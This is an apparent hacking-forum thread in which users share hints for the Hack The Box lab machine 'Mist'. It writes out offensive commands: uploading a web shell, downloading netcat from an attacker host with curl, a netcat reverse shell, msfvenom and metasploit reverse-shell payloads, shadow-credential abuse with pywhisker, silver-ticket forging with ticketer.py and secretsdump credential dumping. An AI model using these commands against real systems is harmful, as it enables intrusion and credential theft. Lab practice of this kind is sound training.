Posts: 37
Threads: 1
Joined: Jul 2023
(Apr 02, 2024, 05:58 PM)thing7 Wrote: (Mar 31, 2024, 02:58 AM)osamy7592 Wrote: (Mar 31, 2024, 02:46 AM)iNone Wrote: (Mar 31, 2024, 02:42 AM)osamy7592 Wrote: After gaining a shell and becoming svc user .. What is the next step any hint ?
How did you get the shell? You import the module, but what shell do you use, and how can I bypass the AV? Because the shell kicks me.
OK guys, get a p0wny shell from here: https://github.com/flozz/p0wny-shell/blo.../shell.php
After that, go to http://mist.htb/data/modules .... and so on. After you get shell.php, click on it, OK.
Now you have a shell. You can forward it to your Kali. First, download nc64.exe on Kali, then set up a web server with python -m http.server, and from the p0wny shell write curl http://kali ip:port/nc64.exe -o nc.exe
Now set nc -nlvp 4444 and from the p0wny shell write nc.exe kali ip 4444 -e cmd.exe. Now you have a shell on your Kali.
So, any hint after gaining the shell? After gaining p0wnyshell, I add the curl command to download nc64.exe and the shell dies at that moment.
What other payload can I use to get a shell as ms01\svc_web? Any shortcut?
Do not use nc in this step.
Prepare shell in msfvenom
exp: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe > shell.exe
Afterwards, in p0wnyshell, load the shell into C:\\xampp\\htdocs
Run on Kali msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST <IP>
run
Run shell through p0wnyshell and then the session will not fall off
Posts: 26
Threads: 0
Joined: Apr 2024
(Apr 03, 2024, 01:23 AM)Th35t0rm Wrote: (Apr 02, 2024, 11:09 PM)orwell1984 Wrote: (Apr 02, 2024, 10:45 PM)Test12349 Wrote: (Apr 02, 2024, 10:40 PM)orwell1984 Wrote: (Apr 02, 2024, 10:29 PM)Test12349 Wrote: Not sure if it's a rabbit hole, but you can get ntlm hashes for svc_ca$ and svc_cabackup. Stuck here too
I got hash for svc_ca$. How did you get the hash for svc_cabackup?
https://github.com/ShutdownRepo/pywhisker.git
I've tried that with svc_ca$, op_sharon.mullard and other creds, but I always get:
Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
python pywhisker.py -d "mist.htb" --dc-ip 192.168.100.100 -u 'svc_ca$' -H {SVC_CA$_HASH} --target "svc_cabackup" --action "add"
Maybe a really stupid question, but I hope anyone can answer this for me.
How do you run python scripts through your shells?
Or do you add routes to your attack machines to target 192.168.100.100?
Posts: 16
Threads: 3
Joined: Apr 2024
Yes, use autoroute in MSF + socks proxy + proxychains.
Is anyone able to access the machine now on any VPN?
Posts: 42
Threads: 2
Joined: Jan 2024
(Apr 03, 2024, 08:18 AM)Test12349 Wrote: Yes, use autoroute in MSF + socks proxy + proxychains.
Is anyone able to access the machine now on any VPN?
No, I've been waiting the whole day but nothing works.
Posts: 119
Threads: 10
Joined: Jan 2024
Same here! Unable to access machine for the last 6 hours :|
Posts: 42
Threads: 2
Joined: Jan 2024
(Apr 03, 2024, 09:05 AM)adn Wrote: I'm trying to get the cert so I can get TGT -> ST, but I can only get private key, and I can't create the pfx.
Any hint please?
Maybe I'm using the wrong tool?
How can you connect to the machine? We haven't been able to connect to the machine for many hours.
Posts: 116
Threads: 6
Joined: Mar 2024
Ping works, the rest is dead.
Can somebody explain how to properly getST and then dump hashes, please?
Used getST and tried to use ticketer.py, but then I can't access shares on ms01 or dump with secretsdump.py.
Maybe the SPN is wrong?
proxychains python3 examples/ticketer.py -nthash '4a74........e6d833' -domain-sid S-1-5-21-1075431363-3458046882-2723919965 -domain MIST.HTB -spn ldap/DC01.mist.htb MS01$
Also tried -spn cifs/DC01.mist.htb
secretsdump simply hangs.
Instead, how can we use Rubeus to get a Silver Ticket and then dump creds? Stuck.
Posts: 28
Threads: 0
Joined: Jan 2024
statement now issued by the HTB platform:
We are aware of an issue preventing users from accessing the service on port 80 on Mist. The issue has been identified, and we are preparing and distributing a fix now, and will update when it is complete.
Posts: 42
Threads: 2
Joined: Jan 2024
(Apr 03, 2024, 02:32 PM)adn Wrote: It's working again, let's go boys & girls, let's break the TGT wall in front of us!
Which VPN server does it work on?
Posts: 116
Threads: 6
Joined: Mar 2024
(Apr 03, 2024, 02:32 PM)adn Wrote: It's working again, let's go boys & girls, let's break the TGT wall in front of us!
doesn't work for me :/